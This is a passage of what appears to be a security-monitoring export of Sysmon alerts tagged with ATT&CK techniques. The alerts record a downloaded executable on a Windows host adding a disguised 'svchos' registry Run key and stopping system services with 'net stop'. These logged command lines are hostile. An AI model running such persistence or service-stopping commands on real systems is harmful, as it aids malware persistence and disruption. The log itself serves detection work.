9d3a6d35-86a4-4814-a612-6ad09cb2b406 +Faulting package full name: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: CortanaUI""",, +"May 23, 2020 @ 12:44:44.102",10,"ATT&CK T1060: 
Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 12:44:34.500 +ProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000} +ProcessId: 34688 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\cUIyKIO.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:34.500880600Z"",""eventRecordID"":""1673"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 12:44:34.500\r\nProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000}\r\nProcessId: 34688\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 12:44:34.500"",""processGuid"":""{df9fc3d3-1ab2-5ec9-0000-0010bae01000}"",""processId"":""34688"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe""}}}" +"May 23, 2020 @ 12:44:44.076",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:34.489 +ProcessGuid: 
{df9fc3d3-1ab2-5ec9-0000-0010bae01000} +ProcessId: 34688 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" /f +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-1ab2-5ec9-0000-00101cde1000} +ParentProcessId: 34644 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:34.491661300Z"",""eventRecordID"":""1672"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:34.489\r\nProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000}\r\nProcessId: 34688\r\nImage: 
C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" /f\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-1ab2-5ec9-0000-00101cde1000}\r\nParentProcessId: 34644\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:34.489"",""processGuid"":""{df9fc3d3-1ab2-5ec9-0000-0010bae01000}"",""processId"":""34688"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" /f"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-1ab2-5ec9-0000-00101cde1000}"",""parentProcessId"":""34644"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:44:35.984",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 12:44:20.956 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00} +ProcessId: 2392 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\sQCMgCG.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.985304400Z"",""eventRecordID"":""1664"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 12:44:20.956\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00}\r\nProcessId: 2392\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 12:44:20.956"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-001004930e00}"",""processId"":""2392"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe""}}}" +"May 23, 2020 @ 12:44:35.661",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.748 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00} +ProcessId: 2392 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010bf720e00} +ParentProcessId: 8168 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f""","REG ADD 
\""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.756348700Z"",""eventRecordID"":""1663"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.748\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00}\r\nProcessId: 2392\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010bf720e00}\r\nParentProcessId: 8168\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 
/f\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.748"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-001004930e00}"",""processId"":""2392"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-1aa3-5ec9-0000-0010bf720e00}"",""parentProcessId"":""8168"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:44:35.653",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.696 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00105c900e00} +ProcessId: 8156 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ 
+User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00} +ParentProcessId: 5548 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.715081400Z"",""eventRecordID"":""1661"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.696\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00105c900e00}\r\nProcessId: 8156\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00}\r\nParentProcessId: 5548\r\nParentImage: 
C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.696"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-00105c900e00}"",""processId"":""8156"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aa4-5ec9-0000-00103f820e00}"",""parentProcessId"":""5548"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:35.649",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.408 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00107e880e00} +ProcessId: 4820 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00} +ParentProcessId: 6912 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.445787700Z"",""eventRecordID"":""1660"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.408\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00107e880e00}\r\nProcessId: 4820\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00}\r\nParentProcessId: 6912\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.408"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-00107e880e00}"",""processId"":""4820"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aa3-5ec9-0000-001062760e00}"",""parentProcessId"":""6912"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:35.646",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.264 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00} +ProcessId: 5548 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.269438000Z"",""eventRecordID"":""1659"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.264\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00}\r\nProcessId: 5548\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 
\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.264"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-00103f820e00}"",""processId"":""5548"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.643",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.990 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00} +ProcessId: 6912 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: 